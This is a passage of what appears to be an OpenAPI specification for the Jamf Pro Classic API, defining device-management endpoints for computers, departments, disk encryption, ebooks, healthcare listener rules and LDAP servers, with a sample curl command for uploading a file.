- computerhardwaresoftwarereports
description: 'Displays hardware/software reports for the date range specified for a computer specified with the {serialnumber} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerhardwaresoftwarereports/serialnumber/C0Q10E7KDKQ1/2016-01-01_2016-12-31'
operationId: findComputerHardwareSoftwareReportsBySerial
summary: Finds hardware/software reports by computer serial number
'/computerhardwaresoftwarereports/udid/{udid}/{start_date}_{end_date}':
get:
parameters:
- description: UDID to filter by
in: path
name: udid
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhardwaresoftwarereports
description: 'Displays hardware/software reports for the date range specified for a computer specified with the {udid} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerhardwaresoftwarereports/udid/ABC1FE75-144A-5F66-944B-8D37B6CFABCD/2016-01-01_2016-12-31'
operationId: findComputerHardwareSoftwareReportsByUDID
summary: Finds hardware/software reports by computer UDID
'/computerhistory/id/{id}':
get:
parameters:
- description: Computer Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerhistory
operationId: findComputerHistoryById
summary: Finds computer history by id
'/computerhistory/id/{id}/subset/{subset}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhistory
description: 'Displays information specified with the {subset} parameter for a computer specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computerhistory/id/3/subset/General&UserLocation&Audits or /computerhistory/id/3/subset/General&Audits or /computerhistory/name/MyComputer/subset/General.'
operationId: findComputerHistoryByIdSubset
summary: Display subsets of information for a computer history
'/computerhistory/macaddress/{macaddress}':
get:
parameters:
- description: Computer Mac Address to filter by
in: path
name: macaddress
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhistory
operationId: findComputerHistoryByMacAddress
summary: Finds computer history by mac address
'/computerhistory/name/{name}':
get:
parameters:
- description: Computer Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhistory
operationId: findComputerHistoryByName
summary: Finds computer history by name
'/computerhistory/serialnumber/{serialnumber}':
get:
parameters:
- description: Computer Serial Number to filter by
in: path
name: serialnumber
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhistory
operationId: findComputerHistoryBySerialNumber
summary: Finds computer history by serial number
'/computerhistory/udid/{udid}':
get:
parameters:
- description: Computer UDID to filter by
in: path
name: udid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhistory
operationId: findComputerHistoryByUDID
summary: Finds computer history by UDID
/computerinventorycollection:
get:
responses:
'200':
description: No response was specified
tags:
- computerinventorycollection
operationId: findcomputerinventorycollection
summary: Finds the Jamf Pro computer inventory collection information
put:
responses:
'200':
description: No response was specified
tags:
- computerinventorycollection
operationId: updateActivationCode
summary: Updates the Jamf Pro computer inventory collection information
/computerinvitations:
get:
responses:
'200':
description: No response was specified
tags:
- computerinvitations
operationId: findComputerInvitations
summary: Finds all computer invitations
'/computerinvitations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerinvitations
operationId: deleteComputerInvitationById
summary: Deletes a computer invitation by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerinvitations
operationId: findComputerInvitationsById
summary: Finds computer invitations by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerinvitations
operationId: createComputerInvitationById
summary: Creates a new computer invitation by id
'/computerinvitations/invitation/{invitation}':
get:
parameters:
- description: Invitation to filter by
in: path
name: invitation
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerinvitations
description: You can POST and DELETE using this resource URL.
operationId: findComputerInvitationsByInvitation
summary: Finds computer invitations by invitation
'/computerinvitations/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerinvitations
description: You can POST and DELETE using this resource URL. Name is assumed to be the invitation identifier.
operationId: findComputerInvitationsByName
summary: Finds computer invitations by name
'/computermanagement/id/{id}':
get:
parameters:
- description: Computer Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computermanagement
description: Computer command information is available in computerhistory. FileVault 2 information is not available.
operationId: findComputerManagementById
summary: Finds computer management information by id
'/computermanagement/id/{id}/patchfilter/{filter}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- default: Chrome
description: filter to filter by
in: path
name: filter
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
description: 'Displays information for a computer specified with the {id} and {filter} parameters. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computermanagement/id/3/patchfilter/Chrome. Only patch information is shown.'
operationId: findComputerManagementByIdPatchFilter
summary: Display patch management information for a computer and filter
'/computermanagement/id/{id}/subset/{subset}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
description: 'Displays information specified with the {subset} parameter for a computer specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computermanagement/id/3/subset/General&Policies&Restricted_Software or /computermanagement/id/3/subset/General&EBooks or /computermanagement/name/MyComputer/subset/General. Computer command information is available in computerhistory.'
operationId: findComputerManagementByIdSubset
summary: 'Display subsets of management information for a computer '
'/computermanagement/id/{id}/username/{username}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- default: Sally
description: Username to filter by
in: path
name: username
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
description: 'Displays information for a computer specified with the {id} and {username} parameters. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computermanagement/id/3/username/Sally. Computer command information is available in computerhistory.'
operationId: findComputerManagementByIdUsername
summary: Display management information for a computer and username
'/computermanagement/id/{id}/username/{username}/subset/{subset}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- description: Username to filter by
in: path
name: username
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
description: 'Displays information specified with the {subset} parameter for a computer specified with the {id} and {username} parameters. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computermanagement/id/3/username/fred/subset/General&Policies&Restricted_Software or /computermanagement/id/3/username/Sally/subset/General&EBooks. Computer command information is available in computerhistory.'
operationId: findComputerManagementByIdUsernameSubset
summary: Display subsets of management information for a computer and username
'/computermanagement/macaddress/{macaddress}':
get:
parameters:
- description: Computer Mac Address to filter by
in: path
name: macaddress
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
operationId: findComputerManagementByMacAddress
summary: Finds computer management information by mac address
'/computermanagement/name/{name}':
get:
parameters:
- description: Computer Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
operationId: findComputerManagementByName
summary: Finds computer management information by name
'/computermanagement/serialnumber/{serialnumber}':
get:
parameters:
- description: Computer Serial Number to filter by
in: path
name: serialnumber
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
operationId: findComputerManagementBySerialNumber
summary: Finds computer management information by serial number
'/computermanagement/udid/{udid}':
get:
parameters:
- description: Computer UDID to filter by
in: path
name: udid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computermanagement
operationId: findComputerManagementByUDID
summary: Finds computer management information by UDID
/computerreports:
get:
responses:
'200':
description: No response was specified
tags:
- computerreports
operationId: findComputerReports
summary: Finds all computer reports
'/computerreports/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerreports
operationId: findComputeReportsById
summary: Finds computer reports by id
'/computerreports/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerreports
operationId: findComputeReportsByName
summary: Finds computer reports by name
/computers:
get:
responses:
'200':
description: No response was specified
tags:
- computers
operationId: findComputers
summary: Finds all computers
'/computers/extensionattributedataflush/id/{id}':
delete:
parameters:
- description: ID of the computer extension attribute data to be deleted
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
operationId: flushComputerExtensionAttributeData
summary: Deletes data collected by an extension attribute
'/computers/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can DELETE using the resource URLs with parameters of {name}, {udid}, {serial number}, or {macaddress}.'
operationId: deleteComputerById
summary: Deletes a computer by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computers
operationId: findComputersById
summary: Finds computers by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can POST using the resource URLs with parameters of {name}, {udid}, {serial number}, or {macaddress}. Certificates and mdm_capable are ignored in a POST.'
operationId: createComputerById
summary: Creates a computer by specifying an id of 0
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can PUT using the resource URLs with parameters of {name}, {udid}, {serial number}, or {macaddress}. Certificates and mdm_capable are ignored in a PUT.'
operationId: updateComputerById
summary: Updates an existing computer by id
'/computers/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'Displays information specified with the {subset} parameter for a computer specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. For example, /computers/id/3/subset/General&Location&Purchasing or /computers/name/MyComputer/subset/General.'
operationId: findComputersByIdSubset
summary: Display subsets of information for a computer
'/computers/macaddress/{macaddress}':
get:
parameters:
- description: Mac address to filter by
in: path
name: macaddress
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputersByMacAddress
summary: Finds computers by mac address
'/computers/match/name/{matchname}':
get:
parameters:
- description: Name to filter by.
in: path
name: matchname
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'For example, /computers/match/name/Fred. A larger set of identifying information can be shown by requesting the basic subset, for example /computers/match/name/Fred/subset/basic'
operationId: matchComputersNames
summary: Searches for computers that match the provided name parameter
'/computers/match/{match}':
get:
parameters:
- description: 'Name, mac address, etc. to filter by. Match uses the same format as the general search in Jamf Pro. For instance, admin* can be used to match computer names that begin with admin'
in: path
name: match
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'GET computers with a value equal to the {match} parameter.'
operationId: matchComputers
summary: Searches for computers that match the provided parameter
'/computers/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputersByName
summary: Finds the first computer with the given name
'/computers/serialnumber/{serialnumber}':
get:
parameters:
- description: Serial number to filter by
in: path
name: serialnumber
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputersBySerialNumber
summary: Finds computers by serial number
/computers/subset/basic:
get:
responses:
'200':
description: No response was specified
tags:
- computers
description: returns a larger set of information about the computers in Jamf Pro.
operationId: findComputersBasic
summary: Finds all computers
'/computers/udid/{udid}':
get:
parameters:
- description: UDID to filter by
in: path
name: udid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputersByUDID
summary: Finds computers by UDID
/departments:
get:
responses:
'200':
description: No response was specified
tags:
- departments
operationId: findDepartments
summary: Finds all departments
'/departments/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- departments
operationId: deleteDepartmentById
summary: Deletes a department by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- departments
operationId: findDepartmentsById
summary: Finds departments by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- departments
operationId: createDepartmentById
summary: Creates a new department by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- departments
operationId: updateDepartmentById
summary: Updates an existing department by id
'/departments/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- departments
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findDepartmentsByName
summary: Finds departments by name
/directorybindings:
get:
responses:
'200':
description: No response was specified
tags:
- directorybindings
operationId: findDirectoryBindings
summary: Finds all directory bindings
'/directorybindings/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- directorybindings
operationId: deleteDirectoryBindingById
summary: Deletes a directory binding by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- directorybindings
operationId: findDirectoryBindingsById
summary: Finds directory bindings by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- directorybindings
operationId: createDirectoryBindingById
summary: Creates a new directory binding by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- directorybindings
operationId: updateDirectoryBindingById
summary: Updates an existing directory binding by id
'/directorybindings/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- directorybindings
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findDirectoryBindingsByName
summary: Finds directory bindings by name
/diskencryptionconfigurations:
get:
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
operationId: findDiskEncryptionConfigurations
summary: Finds all disk encryption configurations
'/diskencryptionconfigurations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
operationId: deleteDiskEncryptionConfigurationById
summary: Deletes a disk encryption configuration by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
operationId: findDiskEncryptionConfigurationsById
summary: Finds disk encryption configurations by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
operationId: createDiskEncryptionConfigurationById
summary: Creates a new disk encryption configuration by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
operationId: updateDiskEncryptionConfigurationById
summary: Updates an existing disk encryption configuration by id
'/diskencryptionconfigurations/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- diskencryptionconfigurations
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findDiskEncryptionConfigurationsByName
summary: Finds disk encryption configurations by name
/distributionpoints:
get:
responses:
'200':
description: No response was specified
tags:
- distributionpoints
operationId: findDistributionPoints
summary: Finds all distribution points
'/distributionpoints/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- distributionpoints
operationId: deleteDistributionPointById
summary: Deletes a distribution point by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- distributionpoints
operationId: findDistributionPointsById
summary: Finds distribution points by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- distributionpoints
operationId: createDistributionPointById
summary: Creates a new distribution point by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- distributionpoints
operationId: updateDistributionPointById
summary: Updates an existing distribution point by id
'/distributionpoints/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- distributionpoints
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findDistributionPointsByName
summary: Finds distribution points by name
/dockitems:
get:
responses:
'200':
description: No response was specified
tags:
- dockitems
operationId: findDockItems
summary: Finds all dock items
'/dockitems/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- dockitems
operationId: deleteDockItemById
summary: Deletes a dock item by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- dockitems
operationId: findDockItemsById
summary: Finds dock items by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- dockitems
operationId: createDockItemById
summary: Creates a new dock item by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- dockitems
operationId: updateDockItemById
summary: Updates an existing dock item by id
'/dockitems/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- dockitems
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findDockItemsByName
summary: Finds dock items by name
/ebooks:
get:
responses:
'200':
description: No response was specified
tags:
- ebooks
operationId: findEBooks
summary: Finds all ebooks
'/ebooks/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ebooks
operationId: deleteEBookById
summary: Deletes an ebook by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ebooks
operationId: findEBooksById
summary: Finds ebooks by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ebooks
operationId: createEBookById
summary: Creates a new ebook by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ebooks
operationId: updateEBookById
summary: Updates an existing ebook by id
'/ebooks/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ebooks
description: 'Displays information specified with the {subset} parameter for an ebook specified with the {id} parameter. Lookup by name is also supported. For example, /ebooks/id/3/subset/General&Location&Purchasing or /ebooks/name/MyComputer/subset/Location&Purchasing.'
operationId: findEbookssByIdSubset
summary: Display subsets of information for an ebook
'/ebooks/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ebooks
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findEBooksByName
summary: Finds ebooks by name
'/fileuploads/{resource}/{idType}/{id}':
post:
responses:
'200':
description: No response was specified
tags:
- fileuploads
description: 'You can POST different types of files by entering parameters for {resource}, {idType}, and {id}, for example /JSSResource/fileuploads/computers/id/2. Attachments can be uploaded by specifying computers, mobiledevices, enrollmentprofiles, printers, or peripherals as the resource. Icons can be uploaded by specifying policies, ebooks, or mobiledeviceapplicationsicon as the resource. A mobile device application can be uploaded by using mobiledeviceapplicationsipa. A disk encryption can be uploaded by specifying diskencryptionconfigurations as the resource. idTypes supported are id and name, although peripheral names are not supported. A sample command is curl -k -u user:password https://my.JamfPro:8443/JSSResource/fileuploads/computers/id/2 -F name=@/Users/admin/Documents/Sample.doc -X POST'
operationId: uploadFiles
summary: Creates file attachments in Jamf Pro
/gsxconnection:
get:
responses:
'200':
description: No response was specified
tags:
- gsxconnection
operationId: findGSXConnection
summary: Finds the Jamf Pro GSX connection information
put:
responses:
'200':
description: No response was specified
tags:
- gsxconnection
operationId: updateGSXConnection
summary: Updates the Jamf Pro GSX connection information
/healthcarelistener:
get:
responses:
'200':
description: No response was specified
tags:
- healthcarelistener
operationId: findHealthcareListener
summary: Find all Healthcare Listener
'/healthcarelistener/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- healthcarelistener
operationId: findHealthcareListenersById
summary: Finds healthcare listener by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- healthcarelistener
operationId: updateHealthCareListenerById
summary: Updates an existing healthcare listener by id
/healthcarelistenerrule:
get:
responses:
'200':
description: No response was specified
tags:
- healthcarelistenerrule
operationId: findHealthcareListenerRule
summary: Find all Healthcare Listener rules
'/healthcarelistenerrule/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
- description: '-1 represents the location field ''Room''; any other number is a mobile device extension attribute ID.'
format: int64
in: path
name: device_inventory_field
required: true
type: integer
- description: 'Accepted values are ''iPhone'' or ''TV'', indicating iOS and tvOS, respectively.'
in: path
name: operating_system
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- healthcarelistenerrule
operationId: findHealthcareListenerRulesById
summary: Finds Healthcare Listener rules by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
- description: Readable name for this rule
name: name
required: true
type: string
- description: '-1 represents the location field ''Room''; any other number is a mobile device extension attribute ID.'
format: int64
in: path
name: device_inventory_field
required: true
type: integer
- description: 'Accepted values are ''iPhone'' or ''TV'', indicating iOS and tvOS, respectively.'
in: path
name: operating_system
required: true
type: string
- description: 'MDM command to for rule to trigger. Valid values are ''EraseDevice'', ''DeviceLock'', ''ClearPasscode'', ''EnableLostMode'', and ''DisableLostMode'''
in: path
name: mdm_command
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- healthcarelistenerrule
operationId: createHealthCareListenerRuleById
summary: Creates a new Healthcare Listener rule
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
- description: Readable name for this rule
name: name
required: true
type: string
- description: '-1 represents the location field ''Room''; any other number is a mobile device extension attribute ID.'
format: int64
in: path
name: device_inventory_field
required: true
type: integer
- description: 'Accepted values are ''iPhone'' or ''TV'', indicating iOS and tvOS, respectively.'
in: path
name: operating_system
required: true
type: string
- description: 'MDM command to for rule to trigger. Valid values are ''EraseDevice'', ''DeviceLock'', ''ClearPasscode'', ''EnableLostMode'', and ''DisableLostMode'''
in: path
name: mdm_command
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- healthcarelistenerrule
operationId: updateHealthCareListenerRuleById
summary: Updates an existing Healthcare Listener rule by id
/ibeacons:
get:
responses:
'200':
description: No response was specified
tags:
- ibeacons
operationId: findIBeacons
summary: Finds all iBeacon regions
'/ibeacons/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ibeacons
operationId: deleteIBeaconById
summary: Deletes an iBeacon region by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ibeacons
operationId: findIBeaconsById
summary: Finds iBeacon regions by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ibeacons
operationId: createIBeaconById
summary: Creates a new iBeacon region by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ibeacons
operationId: updateIBeaconById
summary: Updates an existing iBeacon region by id
'/ibeacons/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ibeacons
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findIBeaconsByName
summary: Finds iBeacon regions by name
/infrastructuremanager:
get:
responses:
'200':
description: No response was specified
tags:
- infrastructuremanager
operationId: findInfrastructureManager
summary: Find all Infrastructure Managers
'/infrastructuremanager/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- infrastructuremanager
operationId: findInfrastructureManagerById
summary: Finds infrastructure manager by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- infrastructuremanager
operationId: updateInfrastructureManagerById
summary: Updates an existing infrastructure manager by id
/jsonwebtokenconfigurations:
get:
responses:
'200':
description: No response was specified
tags:
- jsonwebtokenconfigurations
operationId: findJsonWebTokenConfigurations
summary: Finds all JSON Web Token configurations
'/jsonwebtokenconfigurations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- jsonwebtokenconfigurations
operationId: deleteJsonWebTokenConfigurationById
summary: Deletes a JSON Web Token configuration by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- jsonwebtokenconfigurations
operationId: findJsonWebTokenConfigurationById
summary: Find JSON Web Token configuration by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- jsonwebtokenconfigurations
operationId: createJsonWebTokenConfigurationById
summary: Creates a new JSON Web Token configuration by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- jsonwebtokenconfigurations
operationId: updateJsonWebTokenConfigurationById
summary: Updates an existing JSON Web Token configuration by id
/jssuser:
get:
responses:
'200':
description: No response was specified
tags:
- jssuser
operationId: findjssuser
summary: 'Returns basic information about Jamf Pro, as well as privileges of the person requesting the resource. Deprecated.'
/ldapservers:
get:
responses:
'200':
description: No response was specified
tags:
- ldapservers
operationId: findLDAPServers
summary: Finds all ldapservers
'/ldapservers/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ldapservers
operationId: deleteLDAPServerById
summary: Deletes a ldap server by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ldapservers
operationId: findLDAPServersById
summary: Finds ldap servers by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ldapservers
operationId: createLDAPServerById
summary: Creates a new ldap server by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- ldapservers
operationId: updateLDAPServerById
summary: Updates an existing ldap server by id
'/ldapservers/id/{id}/group/{group}':
get:
parameters:
- description: Server Id to filter by
in: path
name: id
required: true
type: string
- description: Group to filter by
in: path
name: group
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ldapservers
description: 'Displays information about matching groups for an ldap server specified with the {id} parameter. Server lookup by name is also supported. For example, /ldapservers/id/3/group/Staff or /ldapservers/name/ADServer/group/ITStaff.'
operationId: findLDAPServerGroup
summary: Display information for matching groups for an ldap server
'/ldapservers/id/{id}/group/{group}/user/{user}':
get:
parameters:
- description: Server Id to filter by
in: path
name: id
required: true
type: string
- description: Group to filter by
in: path
name: group
required: true
type: string
- description: User to filter by
in: path
name: user
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ldapservers
description: 'Displays information about user membership in a group for an ldap server specified with the {id} parameter. Exact matches are used for group and user. Multiple users separated by a comma are allowed. Server lookup by name is also supported. For example, /ldapservers/id/3/group/staff/user/Fred, /ldapservers/name/ADServer/group/staff/user/Sam or /ldapservers/name/ADServer/group/staff/user/Fred,Sam.'
operationId: findLDAPServerGroupUser
summary: Display information about user membership in a group for an ldap server
'/ldapservers/id/{id}/user/{user}':
get:
parameters:
- description: Server Id to filter by
in: path
name: id
required: true
type: string
- description: User to filter by
in: path
name: user
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ldapservers
description: 'Displays information about matching users for an ldap server specified with the {id} parameter. Server lookup by name is also supported. For example, /ldapservers/id/3/user/Fred or /ldapservers/name/ADServer/user/Sam.'
operationId: findLDAPServerUser
summary: Display information for matching users for an ldap server
'/ldapservers/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- ldapservers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findLDAPServersByName
summary: Finds ldap servers by name
/licensedsoftware:
get:
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
operationId: findLicensedSoftware
summary: Finds all licensed software
'/licensedsoftware/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
operationId: deleteLicensedSoftwareById
summary: Deletes a computer command by id
get:
parameters:
- description: Id value to filter by
